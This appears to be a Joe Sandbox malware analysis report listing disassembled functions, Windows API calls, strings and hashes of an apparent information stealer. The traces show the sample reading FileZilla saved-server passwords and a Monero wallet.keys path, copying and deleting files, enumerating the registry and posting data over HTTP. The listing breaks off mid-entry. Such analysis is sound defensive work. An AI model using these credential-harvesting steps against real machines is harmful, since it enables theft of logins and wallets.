                                    • Instruction Fuzzy Hash: E5D0C9716097114FC3688F1EB440946FAE8DBD8320715C53FA09AC3750C6B094418B54
                                    Function 00C99AA0 Relevance: .0, Instructions: 15COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                    • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                    Function 00C903B0 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                      • Part of subcall function 00C98F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C98F9B
                                      • Part of subcall function 00C9AC30: lstrcpy.KERNEL32(00000000,?), ref: 00C9AC82
                                      • Part of subcall function 00C9AC30: lstrcat.KERNEL32(00000000), ref: 00C9AC92
                                      • Part of subcall function 00C9ABB0: lstrcpy.KERNEL32(?,00CA0E1A), ref: 00C9AC15
                                      • Part of subcall function 00C9ACC0: lstrlen.KERNEL32(?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C9ACD5
                                      • Part of subcall function 00C9ACC0: lstrcpy.KERNEL32(00000000), ref: 00C9AD14
                                      • Part of subcall function 00C9ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00C9AD22
                                      • Part of subcall function 00C9AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00C9AAF6
                                      • Part of subcall function 00C8A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C8A13C
                                      • Part of subcall function 00C8A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C8A161
                                      • Part of subcall function 00C8A110: LocalAlloc.KERNEL32(00000040,?), ref: 00C8A181
                                      • Part of subcall function 00C8A110: ReadFile.KERNEL32(000000FF,?,00000000,00C8148F,00000000), ref: 00C8A1AA
                                      • Part of subcall function 00C8A110: LocalFree.KERNEL32(00C8148F), ref: 00C8A1E0
                                      • Part of subcall function 00C8A110: CloseHandle.KERNEL32(000000FF), ref: 00C8A1EA
                                      • Part of subcall function 00C98FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C98FE2
                                    • GetProcessHeap.KERNEL32(00000000,000F423F,00CA0DBF,00CA0DBE,00CA0DBB,00CA0DBA), ref: 00C904C2
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C904C9
                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 00C904E5
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CA0DB7), ref: 00C904F3
                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 00C9052F
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CA0DB7), ref: 00C9053D
                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 00C90579
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CA0DB7), ref: 00C90587
                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00C905C3
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CA0DB7), ref: 00C905D5
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CA0DB7), ref: 00C90662
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CA0DB7), ref: 00C9067A
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CA0DB7), ref: 00C90692
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CA0DB7), ref: 00C906AA
                                    • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00C906C2
                                    • lstrcat.KERNEL32(?,profile: null), ref: 00C906D1
                                    • lstrcat.KERNEL32(?,url: ), ref: 00C906E0
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C906F3
                                    • lstrcat.KERNEL32(?,00CA1770), ref: 00C90702
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C90715
                                    • lstrcat.KERNEL32(?,00CA1774), ref: 00C90724
                                    • lstrcat.KERNEL32(?,login: ), ref: 00C90733
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C90746
                                    • lstrcat.KERNEL32(?,00CA1780), ref: 00C90755
                                    • lstrcat.KERNEL32(?,password: ), ref: 00C90764
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C90777
                                    • lstrcat.KERNEL32(?,00CA1790), ref: 00C90786
                                    • lstrcat.KERNEL32(?,00CA1794), ref: 00C90795
                                    • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CA0DB7), ref: 00C907EE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                    • API String ID: 1942843190-555421843
                                    • Opcode ID: e9f734597c1c3978a53bfab7547afc01a19ed289faa41d94b0ca98cc632f557b
                                    • Instruction ID: 66baf18deec2fdc3abd3a94f7b4292e079162eb6937ea6aed765e8064ccfdfc7
                                    • Opcode Fuzzy Hash: e9f734597c1c3978a53bfab7547afc01a19ed289faa41d94b0ca98cc632f557b
                                    • Instruction Fuzzy Hash: 89D12F72910208ABCF04FBF4DD9AEEE7739AF15701F508558F602A7091DF34AA48DBA5
                                    Function 00C859B0 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C9AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00C9AAF6
                                      • Part of subcall function 00C84800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C84889
                                      • Part of subcall function 00C84800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C84899
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00C85A48
                                    • StrCmpCA.SHLWAPI(?,0152E3C0), ref: 00C85A63
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C85BE3
                                    • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0152E240,00000000,?,0152A038,00000000,?,00CA1B4C), ref: 00C85EC1
                                    • lstrlen.KERNEL32(00000000), ref: 00C85ED2
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00C85EE3
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C85EEA
                                    • lstrlen.KERNEL32(00000000), ref: 00C85EFF
                                    • lstrlen.KERNEL32(00000000), ref: 00C85F28
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00C85F41
                                    • lstrlen.KERNEL32(00000000,?,?), ref: 00C85F6B
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00C85F7F
                                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00C85F9C
                                    • InternetCloseHandle.WININET(00000000), ref: 00C86000
                                    • InternetCloseHandle.WININET(00000000), ref: 00C8600D
                                    • HttpOpenRequestA.WININET(00000000,0152E290,?,0152DA28,00000000,00000000,00400100,00000000), ref: 00C85C48
                                      • Part of subcall function 00C9ACC0: lstrlen.KERNEL32(?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C9ACD5
                                      • Part of subcall function 00C9ACC0: lstrcpy.KERNEL32(00000000), ref: 00C9AD14
                                      • Part of subcall function 00C9ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00C9AD22
                                      • Part of subcall function 00C9ABB0: lstrcpy.KERNEL32(?,00CA0E1A), ref: 00C9AC15
                                      • Part of subcall function 00C9AC30: lstrcpy.KERNEL32(00000000,?), ref: 00C9AC82
                                      • Part of subcall function 00C9AC30: lstrcat.KERNEL32(00000000), ref: 00C9AC92
                                    • InternetCloseHandle.WININET(00000000), ref: 00C86017
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                    • String ID: "$"$------$------$------
                                    • API String ID: 874700897-2180234286
                                    • Opcode ID: 07c05dd3fb5a8ce8a5b2d7ce0f5a53b1b05670d9933a00ec7b52261661948850
                                    • Instruction ID: 9cd60cece2bcc9bac8a94036616745142ef1650a38068e820642446c9c86724d
                                    • Opcode Fuzzy Hash: 07c05dd3fb5a8ce8a5b2d7ce0f5a53b1b05670d9933a00ec7b52261661948850
                                    • Instruction Fuzzy Hash: DB12DB72920118ABCF15EBA0DCAAFEEB379BF14700F104599F10666191EF706B48DFA5
                                    Function 00C8CFF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                      • Part of subcall function 00C9ACC0: lstrlen.KERNEL32(?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C9ACD5
                                      • Part of subcall function 00C9ACC0: lstrcpy.KERNEL32(00000000), ref: 00C9AD14
                                      • Part of subcall function 00C9ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00C9AD22
                                      • Part of subcall function 00C9ABB0: lstrcpy.KERNEL32(?,00CA0E1A), ref: 00C9AC15
                                      • Part of subcall function 00C98CF0: GetSystemTime.KERNEL32(00CA0E1B,0152A068,00CA05B6,?,?,00C813F9,?,0000001A,00CA0E1B,00000000,?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C98D16
                                      • Part of subcall function 00C9AC30: lstrcpy.KERNEL32(00000000,?), ref: 00C9AC82
                                      • Part of subcall function 00C9AC30: lstrcat.KERNEL32(00000000), ref: 00C9AC92
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C8D083
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00C8D1C7
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C8D1CE
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C8D308
                                    • lstrcat.KERNEL32(?,00CA1570), ref: 00C8D317
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C8D32A
                                    • lstrcat.KERNEL32(?,00CA1574), ref: 00C8D339
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C8D34C
                                    • lstrcat.KERNEL32(?,00CA1578), ref: 00C8D35B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C8D36E
                                    • lstrcat.KERNEL32(?,00CA157C), ref: 00C8D37D
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C8D390
                                    • lstrcat.KERNEL32(?,00CA1580), ref: 00C8D39F
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C8D3B2
                                    • lstrcat.KERNEL32(?,00CA1584), ref: 00C8D3C1
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C8D3D4
                                    • lstrcat.KERNEL32(?,00CA1588), ref: 00C8D3E3
                                      • Part of subcall function 00C9AB30: lstrlen.KERNEL32(00C84F55,?,?,00C84F55,00CA0DDF), ref: 00C9AB3B
                                      • Part of subcall function 00C9AB30: lstrcpy.KERNEL32(00CA0DDF,00000000), ref: 00C9AB95
                                    • lstrlen.KERNEL32(?), ref: 00C8D42A
                                    • lstrlen.KERNEL32(?), ref: 00C8D439
                                      • Part of subcall function 00C9AD80: StrCmpCA.SHLWAPI(00000000,00CA1568,00C8D2A2,00CA1568,00000000), ref: 00C9AD9F
                                    • DeleteFileA.KERNEL32(00000000), ref: 00C8D4B4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                    • String ID:
                                    • API String ID: 1956182324-0
                                    • Opcode ID: 1c732d7e4ed1ed391462ef261d76ea67842fca8b3af9b95173d77ddef14cb122
                                    • Instruction ID: b81cea4b4701ceee3b75a8c7fe744562353eaaaa52c90bbb63b70fbee2743f9d
                                    • Opcode Fuzzy Hash: 1c732d7e4ed1ed391462ef261d76ea67842fca8b3af9b95173d77ddef14cb122
                                    • Instruction Fuzzy Hash: 17E11072914208ABCF04FBA0DD9AEEE7379AF54301F104554F607B64A1DF31AE08EBA5
                                    Function 00C8CA90 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                      • Part of subcall function 00C9AC30: lstrcpy.KERNEL32(00000000,?), ref: 00C9AC82
                                      • Part of subcall function 00C9AC30: lstrcat.KERNEL32(00000000), ref: 00C9AC92
                                      • Part of subcall function 00C9ABB0: lstrcpy.KERNEL32(?,00CA0E1A), ref: 00C9AC15
                                      • Part of subcall function 00C9ACC0: lstrlen.KERNEL32(?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C9ACD5
                                      • Part of subcall function 00C9ACC0: lstrcpy.KERNEL32(00000000), ref: 00C9AD14
                                      • Part of subcall function 00C9ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00C9AD22
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0152CF40,00000000,?,00CA1544,00000000,?,?), ref: 00C8CB6C
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00C8CB89
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00C8CB95
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C8CBA8
                                    • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00C8CBD9
                                    • StrStrA.SHLWAPI(?,0152CF58,00CA0B56), ref: 00C8CBF7
                                    • StrStrA.SHLWAPI(00000000,0152CF70), ref: 00C8CC1E
                                    • StrStrA.SHLWAPI(?,0152D1F8,00000000,?,00CA1550,00000000,?,00000000,00000000,?,01528A50,00000000,?,00CA154C,00000000,?), ref: 00C8CDA2
                                    • StrStrA.SHLWAPI(00000000,0152D218), ref: 00C8CDB9
                                      • Part of subcall function 00C8C920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00C8C971
                                      • Part of subcall function 00C8C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00C8C97C
                                    • StrStrA.SHLWAPI(?,0152D218,00000000,?,00CA1554,00000000,?,00000000,01528B80), ref: 00C8CE5A
                                    • StrStrA.SHLWAPI(00000000,015289D0), ref: 00C8CE71
                                      • Part of subcall function 00C8C920: lstrcat.KERNEL32(?,00CA0B47), ref: 00C8CA43
                                      • Part of subcall function 00C8C920: lstrcat.KERNEL32(?,00CA0B4B), ref: 00C8CA57
                                      • Part of subcall function 00C8C920: lstrcat.KERNEL32(?,00CA0B4E), ref: 00C8CA78
                                    • lstrlen.KERNEL32(00000000), ref: 00C8CF44
                                    • CloseHandle.KERNEL32(00000000), ref: 00C8CF9C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                    • String ID:
                                    • API String ID: 3744635739-3916222277
                                    • Opcode ID: 83adb8998dd2aa1fdea00e3827a13e0f0059c8d8e6c8619f7da30e945b2c06f7
                                    • Instruction ID: 783820f7035c0c7b2b914e8ad31d74d63b082efe4ccf23d5a0c0ba022d7a2cfc
                                    • Opcode Fuzzy Hash: 83adb8998dd2aa1fdea00e3827a13e0f0059c8d8e6c8619f7da30e945b2c06f7
                                    • Instruction Fuzzy Hash: F6E1FF71910208ABCF14EBE4DCA6FEEB779AF54300F004599F106A7191EF316A49DFA5
                                    Function 00C984B0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                    • RegOpenKeyExA.ADVAPI32(00000000,0152B040,00000000,00020019,00000000,00CA05BE), ref: 00C98534
                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00C985B6
                                    • wsprintfA.USER32 ref: 00C985E9
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00C9860B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00C9861C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00C98629
                                      • Part of subcall function 00C9AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00C9AAF6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenlstrcpy$Enumwsprintf
                                    • String ID: - $%s\%s$?
                                    • API String ID: 3246050789-3278919252
                                    • Opcode ID: 2cddfcf5407a190e7d3f05bc1671d78726b2e97c49d01417a2a713ec60852965
                                    • Instruction ID: f66cea47cffa2174459139c5017c51006ece37de966f4dd9b5fa413f81612e78
                                    • Opcode Fuzzy Hash: 2cddfcf5407a190e7d3f05bc1671d78726b2e97c49d01417a2a713ec60852965
                                    • Instruction Fuzzy Hash: E381FC7191021CABDB24DB54DD95FEA77B8BB48700F1086D8F209A6180DF716B88DFE0
                                    Function 00C94FC0 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                                    Download Yara Rule
                                    APIs
